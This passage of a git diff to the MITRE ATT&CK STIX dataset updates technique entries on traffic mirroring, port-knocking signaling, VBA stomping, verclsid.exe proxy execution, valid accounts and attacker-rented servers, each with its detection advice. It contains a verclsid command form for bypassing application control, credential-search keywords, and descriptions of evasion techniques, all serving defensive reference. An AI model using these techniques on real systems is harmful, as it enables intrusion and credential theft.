[PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)\n\nAdversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).", + "id": "attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-20T14:46:37.477Z", + "created": "2020-10-01T02:08:33.977Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "created": "2020-10-19T13:40:11.118Z", + "modified": "2020-10-22T02:24:54.640Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1", + "description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)\n\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.", + "name": "Traffic Duplication", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1020.001", + "url": "https://attack.mitre.org/techniques/T1020/001" + }, + { + "external_id": "CAPEC-117", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/117.html" + }, + { + "source_name": "Cisco Traffic Mirroring", + "url": "https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html", + "description": "Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020." + }, + { + "source_name": "Juniper Traffic Mirroring", + "url": "https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html", + "description": "Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020." + }, + { + "source_name": "US-CERT-TA18-106A", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." + } + ], + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_data_sources": [ + "Netflow/Enclave netflow", + "Packet capture", + "Network protocol analysis" + ], + "x_mitre_detection": "Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals). Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. ", + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0" + }, { "revoked": false, "id": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Traffic Signaling", - "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.", + "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\n\nOn network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.", "external_references": [ { "source_name": "mitre-attack", @@ -28296,6 +32725,21 @@ "url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631", "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.", "source_name": "Hartrell cd00r 2002" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020." + }, + { + "source_name": "FireEye - Synful Knock", + "url": "https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html", + "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." } ], "object_marking_refs": [ @@ -28316,7 +32760,7 @@ "phase_name": "command-and-control" } ], - "modified": "2020-07-01T18:27:41.755Z", + "modified": "2020-10-21T15:30:44.964Z", "created": "2018-04-18T17:59:24.739Z", "x_mitre_contributors": [ "Josh Day, Gigamon" @@ -28331,14 +32775,15 @@ "x_mitre_platforms": [ "Linux", "macOS", - "Windows" + "Windows", + "Network" ], "x_mitre_network_requirements": true, "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.", "x_mitre_defense_bypassed": [ "Defensive network service scanning" ], - "x_mitre_version": "2.0", + "x_mitre_version": "2.1", "x_mitre_is_subtechnique": false }, { @@ -28876,7 +33321,7 @@ "phase_name": "credential-access" } ], - "modified": "2020-06-17T14:25:38.461Z", + "modified": "2020-10-15T19:39:36.109Z", "created": "2020-02-04T12:47:23.631Z", "x_mitre_platforms": [ "Linux", @@ -28895,9 +33340,13 @@ "SYSTEM" ], "x_mitre_is_subtechnique": false, - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_detection": "While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.\n\nMonitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.\n\nMonitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.\n\nAdditionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.", "x_mitre_data_sources": [ + "Azure activity logs", + "Authentication logs", + "AWS CloudTrail logs", + "Windows event logs", "File monitoring", "Windows Registry", "Process monitoring", @@ -28999,7 +33448,7 @@ "phase_name": "lateral-movement" } ], - "modified": "2020-03-24T12:36:24.608Z", + "modified": "2020-09-16T19:40:44.714Z", "created": "2020-01-30T16:18:36.873Z", "x_mitre_version": "1.0", "x_mitre_is_subtechnique": false, @@ -29127,6 +33576,82 @@ ], "x_mitre_is_subtechnique": false }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1564.007", + "url": "https://attack.mitre.org/techniques/T1564/007" + }, + { + "source_name": "FireEye VBA stomp Feb 2020", + "url": "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html", + "description": "Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020." + }, + { + "source_name": "Evil Clippy May 2019", + "url": "https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/", + "description": "Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant. Retrieved September 17, 2020." + }, + { + "source_name": "Microsoft _VBA_PROJECT Stream", + "url": "https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239", + "description": "Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream: Version Dependent Project Information. Retrieved September 18, 2020." + }, + { + "source_name": "Walmart Roberts Oct 2018", + "url": "https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278", + "description": "Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping \u2014 Advanced Maldoc Techniques. Retrieved September 17, 2020." + }, + { + "source_name": "pcodedmp Bontchev", + "url": "https://github.com/bontchev/pcodedmp", + "description": "Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler. Retrieved September 17, 2020." + }, + { + "source_name": "oletools toolkit", + "url": "https://github.com/decalage2/oletools", + "description": "decalage2. (2019, December 3). python-oletools. Retrieved September 18, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "VBA Stomping", + "description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero\u2019s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)", + "id": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-09-23T11:31:50.407Z", + "created": "2020-09-17T12:51:40.845Z", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_system_requirements": [ + "MS Office version specified in _VBA_PROJECT stream must match host" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_detection": "Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)\n\nIf the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)", + "x_mitre_data_sources": [ + "Process monitoring", + "File monitoring" + ], + "x_mitre_contributors": [ + "Rick Cole, FireEye" + ], + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ] + }, { "id": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. ", @@ -29256,10 +33781,9 @@ ] }, { - "id": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Valid Accounts", - "description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -29282,9 +33806,10 @@ "source_name": "TechNet Audit Policy" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], + "description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)", + "name": "Valid Accounts", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "type": "attack-pattern", "kill_chain_phases": [ { @@ -29304,13 +33829,31 @@ "phase_name": "initial-access" } ], - "modified": "2020-06-20T22:44:36.043Z", + "modified": "2020-10-19T16:01:22.724Z", "created": "2017-05-31T21:31:00.645Z", - "x_mitre_is_subtechnique": false, - "x_mitre_contributors": [ - "Netskope", - "Mark Wee", - "Praetorian" + "x_mitre_version": "2.1", + "x_mitre_data_sources": [ + "AWS CloudTrail logs", + "Stackdriver logs", + "Authentication logs", + "Process monitoring" + ], + "x_mitre_defense_bypassed": [ + "Firewall", + "Host intrusion prevention systems", + "Network intrusion detection system", + "Application control", + "System access controls", + "Anti-virus" + ], + "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.", + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "x_mitre_effective_permissions": [ + "User", + "Administrator" ], "x_mitre_platforms": [ "Linux", @@ -29323,30 +33866,84 @@ "Office 365", "Azure AD" ], - "x_mitre_effective_permissions": [ - "User", - "Administrator" + "x_mitre_contributors": [ + "Netskope", + "Mark Wee", + "Praetorian" ], - "x_mitre_permissions_required": [ - "User", - "Administrator" + "x_mitre_is_subtechnique": false + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1218.012", + "url": "https://attack.mitre.org/techniques/T1218/012" + }, + { + "source_name": "WinOSBite verclsid.exe", + "url": "https://www.winosbite.com/verclsid-exe/\u00a0", + "description": "verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block\u00a0. Retrieved August 10, 2020." + }, + { + "source_name": "LOLBAS Verclsid", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", + "description": "LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020." + }, + { + "source_name": "Red Canary Verclsid.exe", + "url": "https://redcanary.com/blog/verclsid-exe-threat-detection/", + "description": "Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020." + }, + { + "source_name": "BOHOPS Abusing the COM Registry", + "url": "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "description": "BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020." + }, + { + "source_name": "Nick Tyrer GitHub", + "url": "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", + "description": "Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020." + } ], - "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Verclsid", + "description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)\n\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) ", + "id": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-08-19T19:29:18.138Z", + "created": "2020-08-10T13:59:38.443Z", "x_mitre_defense_bypassed": [ - "Firewall", - "Host intrusion prevention systems", - "Network intrusion detection system", "Application control", - "System access controls", - "Anti-virus" + "Digital Certificate Validation" ], + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.", "x_mitre_data_sources": [ - "AWS CloudTrail logs", - "Stackdriver logs", - "Authentication logs", - "Process monitoring" + "Process use of network", + "Process command-line parameters", + "Process monitoring", + "File monitoring" ], - "x_mitre_version": "2.1" + "x_mitre_contributors": [ + "Rodrigo Garcia, Red Canary" + ], + "x_mitre_platforms": [ + "Windows" + ] }, { "object_marking_refs": [ @@ -29405,23 +34002,77 @@ "external_references": [ { "source_name": "mitre-attack", - "external_id": "T1497", - "url": "https://attack.mitre.org/techniques/T1497" + "external_id": "T1583.003", + "url": "https://attack.mitre.org/techniques/T1583/003" }, { - "source_name": "Unit 42 Pirpi July 2015", - "url": "https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/", - "description": "Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019." + "source_name": "TrendmicroHideoutsLease", + "description": "Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.", + "url": "https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf" } ], "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Virtualization/Sandbox Evasion", - "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. \n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n", - "id": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "name": "Virtual Private Server", + "description": "Before compromising a victim, adversaries may rent Virtual Private Servers (VPSs)\u00a0that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.\n\nAcquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)", + "id": "attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795", "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T17:58:32.476Z", + "created": "2020-10-01T00:44:23.935Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1584.003", + "url": "https://attack.mitre.org/techniques/T1584/003" + }, + { + "source_name": "NSA NCSC Turla OilRig", + "url": "https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf", + "description": "NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Virtual Private Server", + "description": "Before compromising a victim, adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)\n\nCompromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.", + "id": "attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T18:01:45.792Z", + "created": "2020-10-01T00:55:17.771Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "created": "2019-04-17T22:22:24.505Z", + "modified": "2020-07-01T16:32:02.272Z", "kill_chain_phases": [ { "kill_chain_name": "mitre-attack", @@ -29432,34 +34083,52 @@ "phase_name": "discovery" } ], - "modified": "2020-07-01T16:32:02.272Z", - "created": "2019-04-17T22:22:24.505Z", - "x_mitre_version": "1.2", - "x_mitre_detection": "Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.", - "x_mitre_data_sources": [ - "Process monitoring", - "Process command-line parameters" + "type": "attack-pattern", + "id": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or 